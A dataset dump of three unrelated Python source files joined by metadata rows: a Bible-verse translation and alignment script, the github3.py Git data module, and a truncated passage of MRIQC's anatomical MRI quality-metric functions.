def align(input_translations, input_filenames, output_filename):
"""
Load one csv file for each translation
Group, align and sort the verses
Export a csv file containing a column for each translation
"""
if len(input_translations) != len(input_filenames):
raise ValueError("Number of translations and number of files must be the same")
M = len(input_translations)
# Load pre-translated data
print "\tLoading data from files..."
#translations,books,chapters,verses,texts_original,texts_en = load_translated_verses(input_translations, input_filenames)
translations,chapters,verses,texts_original,texts_en = csv_import_translated_books(input_filenames, input_translations)
# Calculate similarity between verses
print "\tCalculating similarity matrix..."
similarity = calculate_similarity(texts_en, translations)
def canonical_group_cmp(a, b):
"""
Define sort order for groups of verses
"""
# find two verses from the same translation to compare their canonical order
for i in a:
for j in b:
if translations[i] == translations[j]:
return i - j
# Group the verses
print "\tGrouping verses..."
groups = group_verses(similarity, translations, 3).values()
# print groups
# Put groups back into canonical order
print "\tSorting verses..."
groups.sort(canonical_group_cmp)
# prepare data for csv export
print "\tPreparing csv data..."
csv_rows = []
csv_rows.append(input_translations) # headers
for group in groups:
# create a row in the csv file for every group
if len(group) == M:
# rows where all translations are present, are quick:
group.sort()
row = [u"{0}:{1}:{2}".format(chapters[verse],verses[verse],texts_original[verse]) for verse in group]
else:
# for other rows, we have to find the missing translation, and substitute it with a blank
row = []
for translation in input_translations:
found = False
for verse in group:
if translation == translations[verse]:
# verse found for this translation
row.append(u"{0}:{1}:{2}".format(chapters[verse],verses[verse],texts_original[verse]))
found = True
break
if not found:
# fill in a blank
row.append("")
csv_rows.append(row)
# print csv_rows
# Export to csv file
print "\tWriting csv file..."
with open(output_filename,'wb') as f:
cw = unicodecsv.writer(f, encoding='utf-8')
cw.writerows(csv_rows)
print "\tDone!"
def translate_csv(in_filename, language, out_filename):
"""
Load a bible book from csv file
translate it
save it as a new file
"""
# Create a translator object
gs = goslate.Goslate(retry_times=100, timeout=100)
# Load the bible book to be translated
chapters,verses,texts_original = csv_import_book(in_filename)
# Batch translate the verses if necessary
if language != 'en':
print "Batch translating {0} verses from '{1}' to 'en'".format(len(texts_original), language)
texts_translated = gs.translate(texts_original, 'en', language)
else:
print "Not translating {0} verses already in 'en'".format(len(texts_original))
texts_translated = texts_original
# Write to CSV file
rows = zip(chapters, verses, texts_original, texts_translated)
with open(out_filename,'wb') as f:
cw = unicodecsv.writer(f, encoding='utf-8')
cw.writerow(['chapter','verse','text_original','text_english'])
cw.writerows(rows)
def csv_import_book(filename):
"""
load bible book from csv file
"""
texts = []
chapters = []
verses = []
# Read in a whole file of verses
with open(filename,'rb') as f:
cr = unicodecsv.reader(f, encoding='utf-8')
header = cr.next() # skip header
# Process verses
for cnum,vnum,text in cr:
chapters.append(int(cnum)) # parse integer
verses.append(int(vnum)) # parse integer
texts.append(text.strip()) # remove surrounding whitespace
# return results
return chapters,verses,texts
def csv_export_book(filename, rows=[], chapters=[], verses=[], texts=[]):
if not len(rows) > 0:
rows = zip(chapters, verses, texts)
with open(filename,'wb') as f:
cw = unicodecsv.writer(f,encoding='utf-8')
cw.writerow(['chapter','verse','text'])
cw.writerows(rows)
def csv_import_translated_book(input_file):
"""
import a single translated book from a single translation from single csv file
"""
texts_en = []
texts_original = []
chapters = []
verses = []
# Read in a whole (Google translated) file of verses
with open(input_file, 'rb') as f:
cr = unicodecsv.reader(f, encoding='utf-8')
header = cr.next() # skip header
# Process verses
for cnum,vnum,text_original,text_en in cr:
chapters.append(int(cnum))
verses.append(int(vnum))
texts_original.append(text_original.strip())
texts_en.append(text_en.strip())
# return results
return chapters,verses,texts_original,texts_en
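# Sketch of the translated-book csv layout read by csv_import_translated_book();
# it matches what translate_csv() writes (the file name is hypothetical):
#
#   chapter,verse,text_original,text_english
#   1,1,"<original-language text>","<machine-translated English text>"
#
#   chapters, verses, orig, en = csv_import_translated_book('book_translated.csv')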
def csv_import_translated_books(input_files, input_translations):
"""
import a single book from M translations from M csv files
"""
if len(input_files) != len(input_translations):
raise ValueError("Number of input files and translations are not the same")
translations = []
chapters = []
verses = []
texts_original = []
texts_en = []
for in_file,translation in zip(input_files,input_translations):
c,v,o,e = csv_import_translated_book(in_file)
chapters.extend(c)
verses.extend(v)
texts_original.extend(o)
texts_en.extend(e)
translations.extend([translation]*len(e))
return translations,chapters,verses,texts_original,texts_en
def csv_import_aligned_book(input_file):
"""
Import a single aligned book (e.g. after it is checked by humans)
"""
groups = []
with open(input_file, 'rb') as f:
cr = unicodecsv.reader(f, encoding='utf-8')
translations = cr.next() # header contains translation names
for row in cr:
group = {}
for i in range(len(translations)):
                verse = row[i].split(':', 2)  # chapter, verse, text (text may itself contain ':')
group[translations[i]] = {
'chapternum':int(verse[0]),
'versenum':int(verse[1]),
'text':verse[2].strip()
}
groups.append(group)
return groups | gpl-2.0 | 1,165,888,309,220,726,800 | 2,789,997,109,960,634,000 | 28.14604 | 125 | 0.590029 | false |
msabramo/github3.py | github3/git.py | 5 | 6891 | # -*- coding: utf-8 -*-
"""
github3.git
===========
This module contains all the classes relating to Git Data.
See also: http://developer.github.com/v3/git/
"""
from __future__ import unicode_literals
from json import dumps
from base64 import b64decode
from .models import GitHubObject, GitHubCore, BaseCommit
from .users import User
from .decorators import requires_auth
class Blob(GitHubObject):
"""The :class:`Blob <Blob>` object.
See also: http://developer.github.com/v3/git/blobs/
"""
def __init__(self, blob):
super(Blob, self).__init__(blob)
self._api = blob.get('url', '')
#: Raw content of the blob.
self.content = blob.get('content').encode()
#: Encoding of the raw content.
self.encoding = blob.get('encoding')
#: Decoded content of the blob.
self.decoded = self.content
if self.encoding == 'base64':
self.decoded = b64decode(self.content)
#: Size of the blob in bytes
self.size = blob.get('size')
#: SHA1 of the blob
self.sha = blob.get('sha')
def _repr(self):
return '<Blob [{0:.10}]>'.format(self.sha)
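# Usage sketch (not part of the library itself): fetching and decoding a blob
# through an existing ``repo`` object, e.g. one returned by ``github3.repository()``.
# The sha below is a placeholder value.
#
#   blob = repo.blob('6dcb09b5b57875f334f61aebed695e2e4193db5e')
#   raw = blob.content    # raw content as returned by the API (often base64-encoded)
#   data = blob.decoded   # decoded bytes when encoding == 'base64'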
class GitData(GitHubCore):
"""The :class:`GitData <GitData>` object. This isn't directly returned to
the user (developer) ever. This is used to prevent duplication of some
common items among other Git Data objects.
"""
def __init__(self, data, session=None):
super(GitData, self).__init__(data, session)
#: SHA of the object
self.sha = data.get('sha')
self._api = data.get('url', '')
class Commit(BaseCommit):
"""The :class:`Commit <Commit>` object. This represents a commit made in a
repository.
See also: http://developer.github.com/v3/git/commits/
"""
def __init__(self, commit, session=None):
super(Commit, self).__init__(commit, session)
#: dict containing at least the name, email and date the commit was
#: created
self.author = commit.get('author', {}) or {}
# If GH returns nil/None then make sure author is a dict
self._author_name = self.author.get('name', '')
#: dict containing similar information to the author attribute
self.committer = commit.get('committer', {}) or {}
# blank the data if GH returns no data
self._commit_name = self.committer.get('name', '')
#: :class:`Tree <Tree>` the commit belongs to.
self.tree = None
if commit.get('tree'):
self.tree = Tree(commit.get('tree'), self._session)
def _repr(self):
return '<Commit [{0}:{1}]>'.format(self._author_name, self.sha)
def author_as_User(self):
"""Attempt to return the author attribute as a
:class:`User <github3.users.User>`. No guarantees are made about the
validity of this object, i.e., having a login or created_at object.
"""
return User(self.author, self._session)
def committer_as_User(self):
"""Attempt to return the committer attribute as a
:class:`User <github3.users.User>` object. No guarantees are made
about the validity of this object.
"""
return User(self.committer, self._session)
class Reference(GitHubCore):
"""The :class:`Reference <Reference>` object. This represents a reference
created on a repository.
See also: http://developer.github.com/v3/git/refs/
"""
def __init__(self, ref, session=None):
super(Reference, self).__init__(ref, session)
self._api = ref.get('url', '')
#: The reference path, e.g., refs/heads/sc/featureA
self.ref = ref.get('ref')
#: :class:`GitObject <GitObject>` the reference points to
self.object = GitObject(ref.get('object', {}))
def _repr(self):
return '<Reference [{0}]>'.format(self.ref)
def _update_(self, ref):
self.__init__(ref, self._session)
@requires_auth
def delete(self):
"""Delete this reference.
:returns: bool
"""
return self._boolean(self._delete(self._api), 204, 404)
@requires_auth
def update(self, sha, force=False):
"""Update this reference.
:param str sha: (required), sha of the reference
:param bool force: (optional), force the update or not
:returns: bool
"""
data = {'sha': sha, 'force': force}
json = self._json(self._patch(self._api, data=dumps(data)), 200)
if json:
self._update_(json)
return True
return False
class GitObject(GitData):
"""The :class:`GitObject <GitObject>` object."""
def __init__(self, obj):
super(GitObject, self).__init__(obj, None)
#: The type of object.
self.type = obj.get('type')
def _repr(self):
return '<Git Object [{0}]>'.format(self.sha)
class Tag(GitData):
"""The :class:`Tag <Tag>` object.
See also: http://developer.github.com/v3/git/tags/
"""
def __init__(self, tag):
super(Tag, self).__init__(tag, None)
#: String of the tag
self.tag = tag.get('tag')
#: Commit message for the tag
self.message = tag.get('message')
#: dict containing the name and email of the person
self.tagger = tag.get('tagger')
#: :class:`GitObject <GitObject>` for the tag
self.object = GitObject(tag.get('object', {}))
def _repr(self):
return '<Tag [{0}]>'.format(self.tag)
class Tree(GitData):
"""The :class:`Tree <Tree>` object.
See also: http://developer.github.com/v3/git/trees/
"""
def __init__(self, tree, session=None):
super(Tree, self).__init__(tree, session)
#: list of :class:`Hash <Hash>` objects
self.tree = [Hash(t) for t in tree.get('tree', [])]
def _repr(self):
return '<Tree [{0}]>'.format(self.sha)
def recurse(self):
"""Recurse into the tree.
:returns: :class:`Tree <Tree>`
"""
json = self._json(self._get(self._api, params={'recursive': '1'}),
200)
return Tree(json, self._session) if json else None
class Hash(GitHubObject):
"""The :class:`Hash <Hash>` object.
See also: http://developer.github.com/v3/git/trees/#create-a-tree
"""
def __init__(self, info):
super(Hash, self).__init__(info)
#: Path to file
self.path = info.get('path')
#: File mode
self.mode = info.get('mode')
#: Type of hash, e.g., blob
self.type = info.get('type')
#: Size of hash
self.size = info.get('size')
#: SHA of the hash
self.sha = info.get('sha')
#: URL of this object in the GitHub API
self.url = info.get('url')
def _repr(self):
return '<Hash [{0}]>'.format(self.sha)
| bsd-3-clause | -6,592,366,404,596,228,000 | -4,702,216,686,280,666,000 | 26.564 | 78 | 0.57742 | false |
oesteban/mriqc | mriqc/qc/anatomical.py | 1 | 21553 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
# pylint: disable=no-member
r"""
Measures based on noise measurements
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. _iqms_cjv:
- :py:func:`~mriqc.qc.anatomical.cjv` -- **coefficient of joint variation**
(:abbr:`CJV (coefficient of joint variation)`):
The ``cjv`` of GM and WM was proposed as objective function by [Ganzetti2016]_ for
the optimization of :abbr:`INU (intensity non-uniformity)` correction algorithms.
Higher values are related to the presence of heavy head motion and large
:abbr:`INU (intensity non-uniformity)` artifacts. Lower values are better.
.. _iqms_cnr:
- :py:func:`~mriqc.qc.anatomical.cnr` -- **contrast-to-noise ratio**
(:abbr:`CNR (contrast-to-noise ratio)`): The ``cnr`` [Magnota2006]_,
is an extension of the :abbr:`SNR (signal-to-noise Ratio)` calculation
to evaluate how separated the tissue distributions of GM and WM are.
Higher values indicate better quality.
.. _iqms_snr:
- :py:func:`~mriqc.qc.anatomical.snr` -- **signal-to-noise ratio**
(:abbr:`SNR (signal-to-noise ratio)`): calculated within the
tissue mask.
.. _iqms_snrd:
- :py:func:`~mriqc.qc.anatomical.snr_dietrich`: **Dietrich's SNR**
(:abbr:`SNRd (signal-to-noise ratio, Dietrich 2007)`) as proposed
by [Dietrich2007]_, using the air background as reference.
.. _iqms_qi2:
- :py:func:`~mriqc.qc.anatomical.art_qi2`: **Mortamet's quality index 2**
(:abbr:`QI2 (quality index 2)`) is a calculation of the goodness-of-fit
of a :math:`\chi^2` distribution on the air mask,
once the artifactual intensities detected for computing
the :abbr:`QI1 (quality index 1)` index have been removed [Mortamet2009]_.
Measures based on information theory
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. _iqms_efc:
- :py:func:`~mriqc.qc.anatomical.efc`:
The :abbr:`EFC (Entropy Focus Criterion)`
[Atkinson1997]_ uses the Shannon entropy of voxel intensities as
an indication of ghosting and blurring induced by head motion.
Lower values are better.
The original equation is normalized by the maximum entropy, so that the
:abbr:`EFC (Entropy Focus Criterion)` can be compared across images with
different dimensions.
.. _iqms_fber:
- :py:func:`~mriqc.qc.anatomical.fber`:
The :abbr:`FBER (Foreground-Background Energy Ratio)` [Shehzad2015]_,
defined as the mean energy of image values within the head relative
to outside the head [QAP-measures]_.
Higher values are better.
Measures targeting specific artifacts
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. _iqms_inu:
- **inu_\*** (*nipype interface to N4ITK*): summary statistics (max, min and median)
of the :abbr:`INU (intensity non-uniformity)` field as extracted by the N4ITK algorithm
[Tustison2010]_. Values closer to 1.0 are better.
.. _iqms_qi:
- :py:func:`~mriqc.qc.anatomical.art_qi1`:
Detect artifacts in the image using the method described in [Mortamet2009]_.
The :abbr:`QI1 (quality index 1)` is the proportion of voxels with intensity
corrupted by artifacts normalized by the number of voxels in the background.
Lower values are better.
.. figure:: ../resources/mortamet-mrm2009.png
The workflow to compute the artifact detection from [Mortamet2009]_.
.. _iqms_wm2max:
- :py:func:`~mriqc.qc.anatomical.wm2max`:
  The white-matter to maximum intensity ratio is the median intensity
  within the WM mask over the 99.95th percentile of the full intensity
  distribution, which captures the existence of long tails due to
  hyper-intensity of the carotid vessels and fat. Values
  should be around the interval [0.6, 0.8].
Other measures
^^^^^^^^^^^^^^
.. _iqms_fwhm:
- **fwhm** (*nipype interface to AFNI*): The :abbr:`FWHM (full-width half maximum)` of
the spatial distribution of the image intensity values in units of voxels [Forman1995]_.
Lower values are better. Uses the gaussian width estimator filter implemented in
AFNI's ``3dFWHMx``:
.. math ::
\text{FWHM} = \sqrt{-{\left[4 \ln{(1-\frac{\sigma^2_{X^m_{i+1,j}-X^m_{i,j}}}
{2\sigma^2_{X^m_{i,j}}}})\right]}^{-1}}
.. _iqms_icvs:
- :py:func:`~mriqc.qc.anatomical.volume_fraction` (**icvs_\***):
the
:abbr:`ICV (intracranial volume)` fractions of :abbr:`CSF (cerebrospinal fluid)`,
:abbr:`GM (gray-matter)` and :abbr:`WM (white-matter)`. They should move within
a normative range.
.. _iqms_rpve:
- :py:func:`~mriqc.qc.anatomical.rpve` (**rpve_\***): the
:abbr:`rPVe (residual partial voluming error)` of :abbr:`CSF (cerebrospinal fluid)`,
:abbr:`GM (gray-matter)` and :abbr:`WM (white-matter)`. Lower values are better.
.. _iqms_summary:
- :py:func:`~mriqc.qc.anatomical.summary_stats` (**summary_\*_\***):
Mean, standard deviation, 5% percentile and 95% percentile of the distribution
of background, :abbr:`CSF (cerebrospinal fluid)`, :abbr:`GM (gray-matter)` and
:abbr:`WM (white-matter)`.
.. _iqms_tpm:
- **overlap_\*_\***:
The overlap of the :abbr:`TPMs (tissue probability maps)` estimated from the image and
the corresponding maps from the ICBM nonlinear-asymmetric 2009c template.
.. math ::
\text{JI}^k = \frac{\sum_i \min{(\text{TPM}^k_i, \text{MNI}^k_i)}}
{\sum_i \max{(\text{TPM}^k_i, \text{MNI}^k_i)}}
.. topic:: References
.. [Dietrich2007] Dietrich et al., *Measurement of SNRs in MR images: influence
of multichannel coils, parallel imaging and reconstruction filters*, JMRI 26(2):375--385.
2007. doi:`10.1002/jmri.20969 <http://dx.doi.org/10.1002/jmri.20969>`_.
.. [Ganzetti2016] Ganzetti et al., *Intensity inhomogeneity correction of structural MR images:
a data-driven approach to define input algorithm parameters*. Front Neuroinform 10:10. 2016.
    doi:`10.3389/fninf.2016.00010 <http://dx.doi.org/10.3389/fninf.2016.00010>`_.
.. [Magnota2006] Magnotta, VA., & Friedman, L., *Measurement of signal-to-noise
and contrast-to-noise in the fBIRN multicenter imaging study*.
J Dig Imag 19(2):140-147, 2006. doi:`10.1007/s10278-006-0264-x
<http://dx.doi.org/10.1007/s10278-006-0264-x>`_.
.. [Mortamet2009] Mortamet B et al., *Automatic quality assessment in
structural brain magnetic resonance imaging*, Mag Res Med 62(2):365-372,
2009. doi:`10.1002/mrm.21992 <http://dx.doi.org/10.1002/mrm.21992>`_.
.. [Tustison2010] Tustison NJ et al., *N4ITK: improved N3 bias correction*,
IEEE Trans Med Imag, 29(6):1310-20,
2010. doi:`10.1109/TMI.2010.2046908 <http://dx.doi.org/10.1109/TMI.2010.2046908>`_.
.. [Shehzad2015] Shehzad Z et al., *The Preprocessed Connectomes Project
Quality Assessment Protocol - a resource for measuring the quality of MRI data*,
Front. Neurosci. Conference Abstract: Neuroinformatics 2015.
doi:`10.3389/conf.fnins.2015.91.00047 <https://doi.org/10.3389/conf.fnins.2015.91.00047>`_.
.. [Forman1995] Forman SD et al., *Improved assessment of significant activation in functional
magnetic resonance imaging (fMRI): use of a cluster-size threshold*,
Magn. Reson. Med. 33 (5), 636–647, 1995.
doi:`10.1002/mrm.1910330508 <https://doi.org/10.1002/mrm.1910330508>`_.
mriqc.qc.anatomical module
^^^^^^^^^^^^^^^^^^^^^^^^^^
"""
import os.path as op
from sys import version_info
from math import pi, sqrt
import numpy as np
import scipy.ndimage as nd
from scipy.stats import kurtosis # pylint: disable=E0611
from io import open # pylint: disable=W0622
from builtins import zip, range # pylint: disable=W0622
from six import string_types
DIETRICH_FACTOR = 1.0 / sqrt(2 / (4 - pi))
FSL_FAST_LABELS = {'csf': 1, 'gm': 2, 'wm': 3, 'bg': 0}
PY3 = version_info[0] > 2
def snr(mu_fg, sigma_fg, n):
r"""
Calculate the :abbr:`SNR (Signal-to-Noise Ratio)`.
The estimation may be provided with only one foreground region in
which the noise is computed as follows:
.. math::
\text{SNR} = \frac{\mu_F}{\sigma_F\sqrt{n/(n-1)}},
where :math:`\mu_F` is the mean intensity of the foreground and
:math:`\sigma_F` is the standard deviation of the same region.
:param float mu_fg: mean of foreground.
:param float sigma_fg: standard deviation of foreground.
:param int n: number of voxels in foreground mask.
:return: the computed SNR
"""
return float(mu_fg / (sigma_fg * sqrt(n / (n - 1))))
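# Worked example (illustrative numbers only): a foreground with mean 1000.0,
# standard deviation 50.0 and 125000 voxels gives
# snr(1000.0, 50.0, 125000) ~= 20.0, since sqrt(n / (n - 1)) is ~1 for large n.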
def snr_dietrich(mu_fg, sigma_air):
r"""
Calculate the :abbr:`SNR (Signal-to-Noise Ratio)`.
    The noise estimate (``sigma_air``) must come from an air mask around the head
    that does not contain artifacts.
The computation is done following the eq. A.12 of [Dietrich2007]_, which
includes a correction factor in the estimation of the standard deviation of
air and its Rayleigh distribution:
.. math::
\text{SNR} = \frac{\mu_F}{\sqrt{\frac{2}{4-\pi}}\,\sigma_\text{air}}.
:param float mu_fg: mean of foreground.
:param float sigma_air: standard deviation of the air surrounding the head ("hat" mask).
:return: the computed SNR for the foreground segmentation
"""
if sigma_air < 1.0:
from .. import MRIQC_LOG
MRIQC_LOG.warning('SNRd - background sigma is too small (%f)', sigma_air)
sigma_air += 1.0
return float(DIETRICH_FACTOR * mu_fg / sigma_air)
def cnr(mu_wm, mu_gm, sigma_air):
r"""
Calculate the :abbr:`CNR (Contrast-to-Noise Ratio)` [Magnota2006]_.
Higher values are better.
.. math::
\text{CNR} = \frac{|\mu_\text{GM} - \mu_\text{WM} |}{\sqrt{\sigma_B^2 +
\sigma_\text{WM}^2 + \sigma_\text{GM}^2}},
where :math:`\sigma_B` is the standard deviation of the noise distribution within
the air (background) mask.
:param float mu_wm: mean of signal within white-matter mask.
:param float mu_gm: mean of signal within gray-matter mask.
:param float sigma_air: standard deviation of the air surrounding the head ("hat" mask).
:return: the computed CNR
"""
return float(abs(mu_wm - mu_gm) / sigma_air)
def cjv(mu_wm, mu_gm, sigma_wm, sigma_gm):
r"""
Calculate the :abbr:`CJV (coefficient of joint variation)`, a measure
related to :abbr:`SNR (Signal-to-Noise Ratio)` and
:abbr:`CNR (Contrast-to-Noise Ratio)` that is presented as a proxy for
the :abbr:`INU (intensity non-uniformity)` artifact [Ganzetti2016]_.
Lower is better.
.. math::
\text{CJV} = \frac{\sigma_\text{WM} + \sigma_\text{GM}}{|\mu_\text{WM} - \mu_\text{GM}|}.
:param float mu_wm: mean of signal within white-matter mask.
:param float mu_gm: mean of signal within gray-matter mask.
:param float sigma_wm: standard deviation of signal within white-matter mask.
:param float sigma_gm: standard deviation of signal within gray-matter mask.
:return: the computed CJV
"""
return float((sigma_wm + sigma_gm) / abs(mu_wm - mu_gm))
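# Worked example (illustrative numbers only): with mu_wm=1000, mu_gm=600,
# sigma_wm=80 and sigma_gm=70, cjv(1000., 600., 80., 70.) == (80 + 70) / 400 == 0.375.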
def fber(img, headmask, rotmask=None):
r"""
Calculate the :abbr:`FBER (Foreground-Background Energy Ratio)` [Shehzad2015]_,
defined as the mean energy of image values within the head relative
to outside the head. Higher values are better.
.. math::
\text{FBER} = \frac{E[|F|^2]}{E[|B|^2]}
:param numpy.ndarray img: input data
:param numpy.ndarray headmask: a mask of the head (including skull, skin, etc.)
:param numpy.ndarray rotmask: a mask of empty voxels inserted after a rotation of
data
"""
fg_mu = np.median(np.abs(img[headmask > 0]) ** 2)
airmask = np.ones_like(headmask, dtype=np.uint8)
airmask[headmask > 0] = 0
if rotmask is not None:
airmask[rotmask > 0] = 0
bg_mu = np.median(np.abs(img[airmask == 1]) ** 2)
if bg_mu < 1.0e-3:
return 0
return float(fg_mu / bg_mu)
def efc(img, framemask=None):
r"""
Calculate the :abbr:`EFC (Entropy Focus Criterion)` [Atkinson1997]_.
Uses the Shannon entropy of voxel intensities as an indication of ghosting
and blurring induced by head motion. A range of low values is better,
with EFC = 0 for all the energy concentrated in one pixel.
.. math::
\text{E} = - \sum_{j=1}^N \frac{x_j}{x_\text{max}}
\ln \left[\frac{x_j}{x_\text{max}}\right]
with :math:`x_\text{max} = \sqrt{\sum_{j=1}^N x^2_j}`.
The original equation is normalized by the maximum entropy, so that the
:abbr:`EFC (Entropy Focus Criterion)` can be compared across images with
different dimensions:
.. math::
\text{EFC} = \left( \frac{N}{\sqrt{N}} \, \log{\sqrt{N}^{-1}} \right) \text{E}
:param numpy.ndarray img: input data
:param numpy.ndarray framemask: a mask of empty voxels inserted after a rotation of
data
"""
if framemask is None:
framemask = np.zeros_like(img, dtype=np.uint8)
n_vox = np.sum(1 - framemask)
# Calculate the maximum value of the EFC (which occurs any time all
# voxels have the same value)
efc_max = 1.0 * n_vox * (1.0 / np.sqrt(n_vox)) * \
np.log(1.0 / np.sqrt(n_vox))
# Calculate the total image energy
b_max = np.sqrt((img[framemask == 0]**2).sum())
# Calculate EFC (add 1e-16 to the image data to keep log happy)
return float((1.0 / efc_max) * np.sum((img[framemask == 0] / b_max) * np.log(
(img[framemask == 0] + 1e-16) / b_max)))
def wm2max(img, mu_wm):
r"""
Calculate the :abbr:`WM2MAX (white-matter-to-max ratio)`,
defined as the maximum intensity found in the volume w.r.t. the
mean value of the white matter tissue. Values close to 1.0 are
better:
.. math ::
\text{WM2MAX} = \frac{\mu_\text{WM}}{P_{99.95}(X)}
"""
return float(mu_wm / np.percentile(img.reshape(-1), 99.95))
def art_qi1(airmask, artmask):
r"""
Detect artifacts in the image using the method described in [Mortamet2009]_.
Caculates :math:`\text{QI}_1`, as the proportion of voxels with intensity
corrupted by artifacts normalized by the number of voxels in the background:
.. math ::
\text{QI}_1 = \frac{1}{N} \sum\limits_{x\in X_\text{art}} 1
Lower values are better.
:param numpy.ndarray airmask: input air mask, without artifacts
:param numpy.ndarray artmask: input artifacts mask
"""
# Count the number of voxels that remain after the opening operation.
# These are artifacts.
return float(artmask.sum() / (airmask.sum() + artmask.sum()))
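# Worked example (illustrative numbers only): 50 artifact voxels against an air
# mask of 99950 voxels gives art_qi1(airmask, artmask) == 50 / 100000 == 5e-4.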
def art_qi2(img, airmask, min_voxels=int(1e3), max_voxels=int(3e5), save_plot=True):
r"""
Calculates :math:`\text{QI}_2`, based on the goodness-of-fit of a centered
:math:`\chi^2` distribution onto the intensity distribution of
non-artifactual background (within the "hat" mask):
.. math ::
\chi^2_n = \frac{2}{(\sigma \sqrt{2})^{2n} \, (n - 1)!}x^{2n - 1}\, e^{-\frac{x}{2}}
where :math:`n` is the number of coil elements.
:param numpy.ndarray img: input data
:param numpy.ndarray airmask: input air mask without artifacts
"""
from sklearn.neighbors import KernelDensity
from scipy.stats import chi2
from mriqc.viz.misc import plot_qi2
# S. Ogawa was born
np.random.seed(1191935)
data = img[airmask > 0]
data = data[data > 0]
# Write out figure of the fitting
out_file = op.abspath('error.svg')
with open(out_file, 'w') as ofh:
ofh.write('<p>Background noise fitting could not be plotted.</p>')
if len(data) < min_voxels:
return 0.0, out_file
modelx = data if len(data) < max_voxels else np.random.choice(
data, size=max_voxels)
x_grid = np.linspace(0.0, np.percentile(data, 99), 1000)
# Estimate data pdf with KDE on a random subsample
kde_skl = KernelDensity(bandwidth=0.05 * np.percentile(data, 98),
kernel='gaussian').fit(modelx[:, np.newaxis])
kde = np.exp(kde_skl.score_samples(x_grid[:, np.newaxis]))
# Find cutoff
kdethi = np.argmax(kde[::-1] > kde.max() * 0.5)
# Fit X^2
param = chi2.fit(modelx[modelx < np.percentile(data, 95)], 32)
chi_pdf = chi2.pdf(x_grid, *param[:-2], loc=param[-2], scale=param[-1])
# Compute goodness-of-fit (gof)
gof = float(np.abs(kde[-kdethi:] - chi_pdf[-kdethi:]).mean())
if save_plot:
out_file = plot_qi2(x_grid, kde, chi_pdf, modelx, kdethi)
return gof, out_file
def volume_fraction(pvms):
r"""
Computes the :abbr:`ICV (intracranial volume)` fractions
corresponding to the (partial volume maps).
.. math ::
\text{ICV}^k = \frac{\sum_i p^k_i}{\sum\limits_{x \in X_\text{brain}} 1}
:param list pvms: list of :code:`numpy.ndarray` of partial volume maps.
"""
tissue_vfs = {}
total = 0
for k, lid in list(FSL_FAST_LABELS.items()):
if lid == 0:
continue
tissue_vfs[k] = pvms[lid - 1].sum()
total += tissue_vfs[k]
for k in list(tissue_vfs.keys()):
tissue_vfs[k] /= total
return {k: float(v) for k, v in list(tissue_vfs.items())}
def rpve(pvms, seg):
"""
Computes the :abbr:`rPVe (residual partial voluming error)`
of each tissue class.
.. math ::
\\text{rPVE}^k = \\frac{1}{N} \\left[ \\sum\\limits_{p^k_i \
\\in [0.5, P_{98}]} p^k_i + \\sum\\limits_{p^k_i \\in [P_{2}, 0.5)} 1 - p^k_i \\right]
"""
pvfs = {}
for k, lid in list(FSL_FAST_LABELS.items()):
if lid == 0:
continue
pvmap = pvms[lid - 1]
pvmap[pvmap < 0.] = 0.
pvmap[pvmap >= 1.] = 1.
totalvol = np.sum(pvmap > 0.0)
upth = np.percentile(pvmap[pvmap > 0], 98)
loth = np.percentile(pvmap[pvmap > 0], 2)
pvmap[pvmap < loth] = 0
pvmap[pvmap > upth] = 0
pvfs[k] = (pvmap[pvmap > 0.5].sum() + (1.0 - pvmap[pvmap <= 0.5]).sum()) / totalvol
return {k: float(v) for k, v in list(pvfs.items())}
def summary_stats(img, pvms, airmask=None, erode=True):
r"""
Estimates the mean, the standard deviation, the 95\%
and the 5\% percentiles of each tissue distribution.
.. warning ::
Sometimes (with datasets that have been partially processed), the air
mask will be empty. In those cases, the background stats will be zero
for the mean, median, percentiles and kurtosis, the sum of voxels in
the other remaining labels for ``n``, and finally the MAD and the
:math:`\sigma` will be calculated as:
.. math ::
\sigma_\text{BG} = \sqrt{\sum \sigma_\text{i}^2}
"""
from .. import MRIQC_LOG
from statsmodels.robust.scale import mad
# Check type of input masks
dims = np.squeeze(np.array(pvms)).ndim
if dims == 4:
# If pvms is from FSL FAST, create the bg mask
stats_pvms = [np.zeros_like(img)] + pvms
elif dims == 3:
stats_pvms = [np.ones_like(pvms) - pvms, pvms]
else:
raise RuntimeError('Incorrect image dimensions ({0:d})'.format(
np.array(pvms).ndim))
if airmask is not None:
stats_pvms[0] = airmask
labels = list(FSL_FAST_LABELS.items())
if len(stats_pvms) == 2:
labels = list(zip(['bg', 'fg'], list(range(2))))
output = {}
for k, lid in labels:
mask = np.zeros_like(img, dtype=np.uint8)
mask[stats_pvms[lid] > 0.85] = 1
if erode:
struc = nd.generate_binary_structure(3, 2)
mask = nd.binary_erosion(
mask, structure=struc).astype(np.uint8)
nvox = float(mask.sum())
if nvox < 1e3:
MRIQC_LOG.warning('calculating summary stats of label "%s" in a very small '
'mask (%d voxels)', k, int(nvox))
if k == 'bg':
continue
output[k] = {
'mean': float(img[mask == 1].mean()),
'stdv': float(img[mask == 1].std()),
'median': float(np.median(img[mask == 1])),
'mad': float(mad(img[mask == 1])),
'p95': float(np.percentile(img[mask == 1], 95)),
'p05': float(np.percentile(img[mask == 1], 5)),
'k': float(kurtosis(img[mask == 1])),
'n': nvox,
}
if 'bg' not in output:
output['bg'] = {
'mean': 0.,
'median': 0.,
'p95': 0.,
'p05': 0.,
'k': 0.,
'stdv': sqrt(sum(val['stdv']**2
for _, val in list(output.items()))),
'mad': sqrt(sum(val['mad']**2
for _, val in list(output.items()))),
'n': sum(val['n'] for _, val in list(output.items()))
}
if 'bg' in output and output['bg']['mad'] == 0.0 and output['bg']['stdv'] > 1.0:
MRIQC_LOG.warning('estimated MAD in the background was too small ('
'MAD=%f)', output['bg']['mad'])
output['bg']['mad'] = output['bg']['stdv'] / DIETRICH_FACTOR
return output
def _prepare_mask(mask, label, erode=True):
fgmask = mask.copy()
if np.issubdtype(fgmask.dtype, np.integer):
if isinstance(label, string_types):
label = FSL_FAST_LABELS[label]
fgmask[fgmask != label] = 0
fgmask[fgmask == label] = 1
else:
fgmask[fgmask > .95] = 1.
fgmask[fgmask < 1.] = 0
if erode:
# Create a structural element to be used in an opening operation.
struc = nd.generate_binary_structure(3, 2)
